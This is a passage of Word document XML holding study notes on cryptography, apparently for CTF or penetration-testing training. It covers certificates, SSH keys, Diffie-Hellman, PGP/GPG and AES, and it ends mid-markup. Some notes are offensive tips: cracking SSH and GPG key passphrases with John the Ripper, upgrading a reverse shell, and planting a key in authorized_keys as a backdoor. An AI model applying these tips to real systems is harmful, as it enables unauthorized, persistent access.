    <w:p w14:paraId="6597636C" w14:textId="0406C7DF" w:rsidR="00E540BC" w:rsidRPr="0084205E" w:rsidRDefault="00E540BC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132E569C" w14:textId="20027842" w:rsidR="00E540BC" w:rsidRPr="0084205E" w:rsidRDefault="00E540BC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Also use public key, linked to digital signatures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CC4CD4" w14:textId="265F06FE" w:rsidR="00E540BC" w:rsidRPr="0084205E" w:rsidRDefault="00E540BC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269C11AC" w14:textId="640F76EA" w:rsidR="00E540BC" w:rsidRPr="0084205E" w:rsidRDefault="00E540BC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Chain of trust starting with a Root Certificate Authority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4051DBE1" w14:textId="3C0FEE62" w:rsidR="00E540BC" w:rsidRPr="0084205E" w:rsidRDefault="00E540BC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Automatically trusted by OS/browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A38FAF2" w14:textId="0E9104BE" w:rsidR="00E540BC" w:rsidRPr="0084205E" w:rsidRDefault="00E540BC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SSH Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6F9A6D" w14:textId="3C549936" w:rsidR="00E540BC" w:rsidRPr="0084205E" w:rsidRDefault="001C366B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Encryption and SSH authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14866EEF" w14:textId="26C45B66" w:rsidR="001C366B" w:rsidRPr="0084205E" w:rsidRDefault="001C366B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Usernames and passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F328C0" w14:textId="317F5711" w:rsidR="001C366B" w:rsidRPr="0084205E" w:rsidRDefault="001C366B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RSA by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3BF732" w14:textId="5B5FF789" w:rsidR="001C366B" w:rsidRPr="0084205E" w:rsidRDefault="001C366B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-keygen”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA81735" w14:textId="6BEC36A1" w:rsidR="001C366B" w:rsidRPr="0084205E" w:rsidRDefault="001C366B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SSH Private Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF8B9F8" w14:textId="64D73008" w:rsidR="001C366B" w:rsidRPr="0084205E" w:rsidRDefault="001E342B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Decrypts the SSH key, does not ID user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5A9EB0" w14:textId="56B528A8" w:rsidR="001E342B" w:rsidRPr="0084205E" w:rsidRDefault="001E342B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Passphrase is never transmitted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE593AA" w14:textId="4F3D65F4" w:rsidR="001E342B" w:rsidRPr="0084205E" w:rsidRDefault="001E342B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can use JohntheRipper to attack encrypted SSH key to find passphrase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017D30EA" w14:textId="658599DB" w:rsidR="001E342B" w:rsidRPr="0084205E" w:rsidRDefault="001E342B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Using Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516C55FA" w14:textId="10868F62" w:rsidR="001E342B" w:rsidRPr="0084205E" w:rsidRDefault="00866C4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>~/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> folder – default storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1537582E" w14:textId="485F22A1" w:rsidR="00866C4F" w:rsidRPr="0084205E" w:rsidRDefault="00866C4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>authorized</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>” – public keys allowed on server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C059F3" w14:textId="47970479" w:rsidR="00866C4F" w:rsidRPr="0084205E" w:rsidRDefault="00866C4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To use a private SSH key, permissions must be set up correctly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079370D9" w14:textId="0C205709" w:rsidR="00866C4F" w:rsidRPr="0084205E" w:rsidRDefault="00866C4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>600 or stricter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB7B2D6" w14:textId="5AFE03BE" w:rsidR="00866C4F" w:rsidRPr="0084205E" w:rsidRDefault="00866C4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -I </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>keyNameGoesHere</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>user@host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE275D9" w14:textId="182314CC" w:rsidR="00866C4F" w:rsidRPr="0084205E" w:rsidRDefault="00866C4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Using SSH Keys to get a better shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E188EA" w14:textId="2C0610F0" w:rsidR="00866C4F" w:rsidRPr="0084205E" w:rsidRDefault="00866C4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> keys are a good way to upgrade a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC4A346" w14:textId="05797416" w:rsidR="00866C4F" w:rsidRPr="0084205E" w:rsidRDefault="00866C4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Assuming user has login enabled (www-data normally does not)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F671097" w14:textId="6795608D" w:rsidR="00866C4F" w:rsidRPr="0084205E" w:rsidRDefault="00866C4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Leaving an SSH key in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> can be a useful backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A5EAA5" w14:textId="64A1A56C" w:rsidR="00020DD9" w:rsidRPr="0084205E" w:rsidRDefault="00020DD9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Explaining Diffie Hellman Key Exchange</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28541786" w14:textId="12B4D884" w:rsidR="00020DD9" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Allows two parties to establish a set of common cryptographic keys without an observer being able to get said keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE2FA66" w14:textId="4F210518" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>How Does DH work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CD3925" w14:textId="5A365BEC" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Secrets (A and B respectively) combined with common material (C) to create AC and BC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727165D1" w14:textId="264A3F82" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>These are traded and combined to form ABC, which both have</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09732A82" w14:textId="581049FC" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Used in combination with RSA to prove identity and prevent </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>MiTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F32BC2" w14:textId="1094463B" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>PGP, GPG, AES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2356F624" w14:textId="278AD56A" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pretty Good Privacy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142A0DB1" w14:textId="224CE37A" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Software that implements encryption for files, digital signing, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="723F06BF" w14:textId="2B3CAAB5" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>GnuPG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516DA56A" w14:textId="6EBD67B5" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Open source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> implementation of PGP from GNU project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7340869C" w14:textId="5E3FA6E9" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Need to use GPG to decrypt files in CTFs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF31C00" w14:textId="4D9CB1C4" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>PGP/GPG can protect private keys with passphrases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5C88BE" w14:textId="517E66FF" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can attempt crack via John the Ripper and gpg2john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79422285" w14:textId="3D4409E9" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Advanced Encryption Standard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763D1758" w14:textId="78C8E7F4" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Replaced DES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E777D31" w14:textId="2AD26805" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Data block operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED5C69" w14:textId="0DFE4995" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>The Future – Quantum Computers and Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5980B0" w14:textId="5B240662" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00FF174B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Asymmetric and Quantum</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1015C48E" w14:textId="47686DA6" w:rsidR="00FF174B" w:rsidRPr="0084205E" w:rsidRDefault="00374570" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
